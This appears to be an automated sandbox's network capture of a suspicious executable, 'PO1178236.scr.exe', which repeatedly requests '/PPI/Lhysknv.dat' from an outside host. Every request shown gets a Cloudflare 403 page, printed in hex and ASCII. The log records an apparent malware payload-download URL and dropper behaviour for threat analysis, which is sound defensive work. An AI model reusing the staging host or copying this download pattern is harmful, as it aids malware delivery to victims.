        2025-01-09 07:36:57 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:57 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 36 31 62 62 39 33 34 33 39 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c261bb934392</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:57 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 36 31 62 62 39 33 34 33 39 32 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c261bb934392',t:'MTczNjQwODIxNy4wMDAwMDA='};v
        2025-01-09 07:36:57 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        100192.168.2.949809188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:58 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:58 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:58 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:13 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXsqzGdu%2F0Ui0LgRn3I8laIdVj9yDZlzO31iYy%2B85zekPHgPqf9%2BBlR0h0PpX1V6tk%2FXOX7yj84arZ040384NXmag57fMA%2BOmaooCP2G1o1Ag1TaWM4kxEFlQYwL2EiS317sz8G4Fx5yZsp2"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2656f410cba-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=568&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1929940&cwnd=219&unsent_bytes=0&cid=9abe25fb72c1c942&ts=128&x=0"
        2025-01-09 07:36:58 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:58 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:58 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:58 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 36 35 36 66 34 31 30 63 62 61 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2656f410cba</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:58 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 36 35 36 66 34 31 30 63 62 61 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2656f410cba',t:'MTczNjQwODIxOC4wMDAwMDA='};v
        2025-01-09 07:36:58 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        101192.168.2.949810188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:58 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:59 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:59 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:14 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5N8CGk3oZabKecIcwC61NUm%2Bl7dGcTK%2BFs1ouFYnMeCM2WqnJFIUOzov3jzBbOHf5uGR3QGvJXnkQTDzPN2FeDGfs0w07heAyUAJjis2F%2FQStkr4OV6kAMM32tVLnKfyjISnE2o5LmqGHmRf"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c26909194261-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1863&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1552365&cwnd=239&unsent_bytes=0&cid=a06c890e23bc8ed2&ts=124&x=0"
        2025-01-09 07:36:59 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:59 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:59 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:59 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 36 39 30 39 31 39 34 32 36 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c26909194261</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:59 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 36 39 30 39 31 39 34 32 36 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c26909194261',t:'MTczNjQwODIxOS4wMDAwMDA='};var a
        2025-01-09 07:36:59 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        102192.168.2.949811188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:59 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:59 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:59 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:14 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SIX%2BFdADg5RGCdOGSNaKaug8FKdEd6h07KQrqXZqZhN8h%2BGLnpfbMnhu8ozm7TTjdqRtOGufAPWEkUdZGJ908%2BGjyglzNASl7uzbuwJTbf%2Fs5IdUVOTKD1a5E8IyiZIAb2gNvc9t3TKDAgap"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c26cfa31c481-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1644&min_rtt=1631&rtt_var=638&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1682027&cwnd=236&unsent_bytes=0&cid=f796dde95388887f&ts=148&x=0"
        2025-01-09 07:36:59 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:59 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:59 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:59 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 36 63 66 61 33 31 63 34 38 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 